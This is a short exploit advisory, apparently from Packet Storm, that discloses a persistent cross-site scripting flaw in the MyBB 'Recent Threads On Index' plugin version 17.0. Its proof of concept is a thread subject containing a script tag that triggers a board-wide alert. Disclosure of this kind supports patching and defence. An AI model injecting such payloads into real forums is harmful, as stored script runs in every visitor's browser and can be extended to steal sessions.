MyBB Recent Threads On Index plugin version 17.0 suffers from a cross site scripting vulnerability.
7f5bcd5124a0662b2bb26f4c57c2a8c8520f51a4ccc24e3ab6702ae8d5f63d02# Exploit Title: MyBB Recent threads
# Date: 4th April 2018
# Exploit Author: Perileos
# Software Link: https://community.mybb.com/mods.php?action=view&pid=191
# Version: 17.0
# Tested on: Windows 10
1. Description:
This plugin shows recent threads in the side bar on your MyBB forum.
2. Proof of concept:
Persistent XSS
- Create a thread with the following subject <p
"""><SCRIPT>alert("XSS")</SCRIPT>">
- Navigate to the index to see a board wide persistent XSS alert.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed